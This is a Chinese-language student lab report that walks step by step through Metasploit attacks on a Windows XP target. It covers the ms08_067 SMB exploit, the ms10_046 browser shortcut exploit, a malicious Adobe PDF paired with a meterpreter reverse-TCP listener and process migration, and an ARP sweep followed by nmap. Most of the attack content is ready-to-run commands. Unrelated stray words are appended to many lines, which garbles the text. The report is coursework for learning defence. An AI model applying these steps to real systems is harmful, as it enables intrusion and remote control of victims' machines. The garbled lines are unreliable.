·掌握metasploit的基本應用方式,掌握經常使用的三種攻擊方式的思路shell
·(1)一個主動攻擊,如ms08_067;數據庫
(2)一個針對瀏覽器的攻擊,如ms11_050;windows
(3)一個針對客戶端的攻擊,如Adobeapi
(4)成功應用任何一個輔助模塊。瀏覽器
解釋什麼是exploit,payload,encode.安全
·exploit:至關於彈殼,將攻擊包傳輸到靶機。session
·payload: 抵達靶機後,執行攻擊方式tcp
·encode:對須要傳輸的文件進行編碼,使本身免殺學習
·kali進入msf編碼
·輸入search ms08_067
後能夠找到滲透模塊
·而後輸入use exploit/windows/smb/ms08_067_netapi
進入該模塊
·show payloads
顯示有效的攻擊載荷
·show targets
顯示能夠被攻擊的靶機操做系統型號
·set payload generic/shell_reverse_tcp
設置有效攻擊載荷
·輸入set LHOST "kali Ip" set RHOST "Win xp Ip"
設置並show options
查看payload狀態。
·輸入exploit
開始攻擊
·在kali上執行ipconfig/all
·在win xp上執行一樣的命令
·先利用search ms10_046
查看可用攻擊模塊
·輸入命令use windows/browser/ms10_046_shortcut_icon_dllloader
,進入該漏洞模塊。
·info查看信息:
·設置好參數並查看,這裏SRVHOST和LHOST都爲Kali的IP地址:
·開始執行,能夠看到生成了一個url
·在靶機的IE瀏覽器上使用該url進行訪問,在Kali上能夠看到
·使用sessions指令查看當前存在的會話,能夠看到存在一個ID爲1的會話:
·使用sessions -i 1
選擇會話1
·獲取shell
·啓動msfconsole後輸入search adobe
尋找可利用漏洞
·輸入use exploit/windows/fileformat/adobe_jbig2decode
進入該漏洞模塊的使用
·使用命令set payload windows/meterpreter/reverse_tcp
設置攻擊有效載荷。
·設置參數
set FILENAME xxx.pdf
set LHOST "KALI Ip"
set LPORT xxxx
·輸入exploit,生成pdf文件
·並能夠看到pdf所在文件夾,將pdf複製到靶機裏。
·使用命令back
退出當前模塊,並使用use exploit/multi/handler
新建一個監聽模塊。
·使用set payload windows/meterpreter/reverse_tcp
創建一個反向鏈接,並將參數設置爲攻擊模塊數據相同
·使用命令exploit
開始攻擊,在xp中打開pdf,並用sysinfo
查看靶機信息
·將進程遷移到explorer.exe.使用ps查看當前進程,並找到explorer.exe的進程號
·使用命令migrate 1884
·輸入shell,查看xp靶機信息
·在靶機xp中使用命令netstat -an
,看本地tcp鏈接。
·先建立一個msf所需的數據庫
·進入msf,輸入命令use auxiliary/scanner/discovery/arp_sweep
進入模塊
·使用命令,設置
set interface eth0
set RHOSTS 172.30.1.0/21
set threads 2
·run開啓掃描,結果能夠看到除了本身主機的IP外,還有其餘ip
·能夠ping通,開啓nmap掃描,能夠看見開啓的端口號,以及目標機的操做系統
本次實驗更加深刻理解了msf的使用,學習到了各類漏洞的尋找以及攻擊方式,對於之後防範這些攻擊有了基礎。